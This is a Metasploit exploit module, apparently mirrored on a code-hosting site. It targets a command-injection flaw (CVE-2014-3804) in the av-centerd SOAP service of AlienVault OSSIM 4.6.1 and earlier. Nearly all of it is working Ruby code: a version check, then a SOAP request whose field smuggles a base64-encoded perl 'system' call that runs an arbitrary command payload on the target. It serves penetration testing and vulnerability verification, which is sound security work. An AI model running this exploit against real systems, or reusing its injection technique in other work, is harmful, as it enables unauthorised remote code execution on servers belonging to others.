adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb
T

147 lines
4.3 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rexml/document'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include REXML
def initialize(info = {})
super(
update_info(
info,
'Name' => 'AlienVault OSSIM av-centerd Command Injection',
'Description' => %q{
This module exploits a code execution flaw in AlienVault 4.6.1 and
prior. The vulnerability exists in the av-centerd SOAP web service,
where the update_system_info_debian_package method uses perl backticks
in an insecure way, allowing command injection. This module has been
tested successfully on AlienVault 4.6.0.
},
'Author' => [
'Unknown', # From HP ZDI team, Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2014-3804'],
['BID', '67999'],
['ZDI', '14-202'],
['URL', 'http://forums.alienvault.com/discussion/2690']
],
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' => {
# 'BadChars' => "[;`$<>|]", # Don't apply bcuz of the perl stub applied
'Compat' => {
'RequiredCmd' => 'perl netcat-e openssl python gawk'
}
},
'DefaultOptions' => {
'SSL' => true
},
'Targets' => [
[ 'AlienVault <= 4.6.1', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2014-05-05',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION]
}
)
)
register_options(
[
Opt::RPORT(40007)
]
)
end
def check
res = send_soap_request('get_dpkg')
return CheckCode::Unknown('Connection failed') unless res
version = ''
if res.code == 200 &&
res.headers['SOAPServer'] &&
res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
res.body.to_s =~ /alienvault-center\s*([\d.]*)-\d/
version = ::Regexp.last_match(1)
end
return CheckCode::Safe if version.blank?
if version >= '4.7.0'
return CheckCode::Safe("AlienVault version #{version} is not vulnerable")
end
CheckCode::Appears("AlienVault version #{version} appears vulnerable")
end
def exploit
send_soap_request('update_system_info_debian_package', 1)
end
def build_soap_request(method)
xml = Document.new
xml.add_element(
'soap:Envelope',
{
'xmlns:xsi' => 'http://www.w3.org/2001/XMLSchema-instance',
'xmlns:soapenc' => 'http://schemas.xmlsoap.org/soap/encoding/',
'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema',
'soap:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/',
'xmlns:soap' => 'http://schemas.xmlsoap.org/soap/envelope/'
}
)
body = xml.root.add_element('soap:Body')
m = body.add_element(
method,
{
'xmlns' => 'AV/CC/Util'
}
)
args = []
args[0] = m.add_element('c-gensym3', { 'xsi:type' => 'xsd:string' })
args[1] = m.add_element('c-gensym5', { 'xsi:type' => 'xsd:string' })
args[2] = m.add_element('c-gensym7', { 'xsi:type' => 'xsd:string' })
args[3] = m.add_element('c-gensym9', { 'xsi:type' => 'xsd:string' })
(0..3).each { |i| args[i].text = rand_text_alpha(4..7) }
if method == 'update_system_info_debian_package'
args[4] = m.add_element('c-gensym11', { 'xsi:type' => 'xsd:string' })
perl_payload = 'system(decode_base64'
perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
args[4].text = rand_text_alpha(4..7).to_s
args[4].text += " && perl -MMIME::Base64 -e '#{perl_payload}'"
end
xml.to_s
end
def send_soap_request(method, timeout = 20)
soap = build_soap_request(method)
send_request_cgi({
'uri' => '/av-centerd',
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap,
'headers' => {
'SOAPAction' => "\"AV/CC/Util##{method}\""
}
}, timeout)
end
end
Reference in New Issue View Git Blame Copy Permalink